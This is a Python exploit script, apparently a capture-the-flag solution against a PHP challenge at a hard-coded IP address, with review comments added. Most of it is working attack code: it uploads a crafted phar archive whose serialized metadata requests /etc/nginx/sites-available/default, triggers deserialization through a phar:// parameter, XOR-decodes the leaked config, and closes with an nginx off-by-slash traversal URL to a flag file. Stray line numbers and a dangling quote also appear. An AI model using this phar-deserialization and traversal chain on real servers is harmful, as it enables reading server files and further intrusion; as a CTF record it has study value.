1import requests
2import re
3import urllib
4import base64
5
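def genkey(a):
    """Derive the 3-byte secret by XORing the start of *a* with the GIF magic bytes.

    Only the first ``len("GIF")`` characters of *a* take part; anything past
    that is ignored.

    Args:
        a: string whose first three characters are combined with ``"GIF"``.

    Returns:
        A 3-character ``str``; character i is ``chr(ord(a[i]) ^ ord("GIF"[i]))``.

    Raises:
        ValueError: if *a* holds fewer than three characters (the original
            version failed with an IndexError here).
    """
    imgsig = "GIF"
    if len(a) < len(imgsig):
        raise ValueError(
            "genkey: need at least %d characters, got %d" % (len(imgsig), len(a))
        )
    # zip() over the truncated input instead of xrange()/indexing so the helper
    # runs unchanged on both Python 2 and Python 3.
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(a[:len(imgsig)], imgsig))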
12
13
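def xor(a, key):
    """Return *a* XORed with *key*, repeating *key* cyclically.

    Accepts ``str`` on both Python 2 and 3, and also ``bytes`` on Python 3
    (indexing ``bytes`` yields ints, which are used directly instead of
    going through ``ord``). The result is always a ``str`` of the same
    length as *a*.

    Args:
        a: data to mask; may be empty.
        key: non-empty keystream, reused from the start once exhausted.

    Returns:
        ``str`` whose character i is ``chr(a[i] ^ key[i % len(key)])``.

    Raises:
        ValueError: if *key* is empty (the original version hit a
            ZeroDivisionError on the modulus in that case).
    """
    if not key:
        raise ValueError("xor: key must not be empty")

    def _byte(c):
        # Python 3 bytes already index to int; str needs ord() on either version.
        return c if isinstance(c, int) else ord(c)

    klen = len(key)
    # range() rather than xrange() keeps the helper Python 2/3 compatible.
    return "".join(chr(_byte(a[i]) ^ _byte(key[i % klen])) for i in range(len(a)))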
19
# 3-byte key: the literal XORed against the "GIF" magic bytes (see genkey).
secretkey = genkey("##\n")

# One Session so any cookie set by the POST below is sent on the later GETs.
s = requests.Session()


# Challenge endpoint used for both the upload and the read-back.
url = "http://192.241.144.92:80/oldchall/e9941d1621bdf00ef6a17c1e5176c1bcbb966b71/index.php?mytresure"

# gen payloadphp from php
# The bare string below is never executed; it records the PHP that produced
# `payloadphp`: a phar archive whose metadata is a serialized `Map` object
# with `way` set to a php://filter path.
"""
<?php

//Generate phar:

$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub("--------------BEGIN--------------\n<?php __HALT_COMPILER(); ? >");

// add object of any class as meta data
class Map
{
 public $len_file_name_accept;
 public $returnimage;
 public $way;
}
$object = new Map;
$object->way = 'php://filter/treasures/resource=/etc/nginx/sites-available/default';

$phar->setMetadata($object);
$phar->stopBuffering();

?>
"""

# Raw bytes of the phar generated above (stub, serialized metadata, one
# entry "test.txt", trailing "GBMB" signature marker).
payloadphp = "<?php __HALT_COMPILER(); ?>\r\n\xcb\x00\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x00\x00\x95\x00\x00\x00O:3:\"Map\":3:{s:20:\"len_file_name_accept\";N;s:11:\"returnimage\";N;s:3:\"way\";s:66:\"php://filter/treasures/resource=/etc/nginx/sites-available/default\";}\x08\x00\x00\x00test.txt\x04\x00\x00\x00*\xb1[]\x04\x00\x00\x00\xc7\xa7\x8b;\xb6\x01\x00\x00\x00\x00\x00\x00text^\xdb\xca\x83\x1e\xfa\x0c\xa2\x88\xe2QE\x8dy\x07\xb9v\xb5O\x02\x00\x00\x00GBMB"
# Form fields as captured from the intercepting proxy: "save" carries the phar.
burp0_data = {"secret": secretkey, "save": payloadphp}
s.post(url, data=burp0_data)

# The page echoes where the upload was stored; the name (minus ".txt") is the
# path fed back through the phar:// wrapper below.
# NOTE(review): re.search returns None when that marker is absent, so
# .group(1) would raise AttributeError -- the script assumes the POST succeeded.
tmp = re.search("Your original treasure stored at (.*)\.txt",s.get(url).text)
pharfile = tmp.group(1)
# secretkey is binary, hence urllib.quote. The "friendtresure" value names the
# uploaded file via phar://, which is what makes the server unserialize the
# archive metadata (presumably inside a file function on the other side).
# NOTE(review): the server-side fix is to never let a request parameter select
# a stream wrapper -- restrict such paths to plain local files and/or disable
# the phar wrapper.
url2 = "http://192.241.144.92/oldchall/e9941d1621bdf00ef6a17c1e5176c1bcbb966b71/index.php?secret="+urllib.quote(secretkey)+"&friendtresure=phar://"+pharfile

# Pull the base64 body of the inline <img> the response renders.
tmp = re.search('\<img src\=\\\"data\:images\/png\;base64\,(.*)\\\" height',s.get(url2).text)

enc = tmp.group(1)
enc = base64.b64decode(enc)
# The returned blob is presumably masked with the same 3-byte key, so the same
# XOR recovers the nginx config selected by `way` in the phar metadata.
config = xor(enc,secretkey)

# Python 2 print statement (the script also relies on xrange and urllib.quote).
print config


# Writeup notes kept as a bare string literal; not executed. "Off by Slash"
# refers to the nginx location/alias trailing-slash misconfiguration that the
# dumped config presumably exposed; the server-side fix is to align the
# trailing slashes of the `location` prefix and its `alias`.
"""
--> flag at: /srv/flag_here_c91ab70e30e0aff0d97fa41a0cecf84c82e6ebb8c04c24fc3a6cb10059271b4c
Find Nginx Off by Slash

http://192.241.144.92/error.html../flag_here_c91ab70e30e0aff0d97fa41a0cecf84c82e6ebb8c04c24fc3a6cb10059271b4c
"""
76"""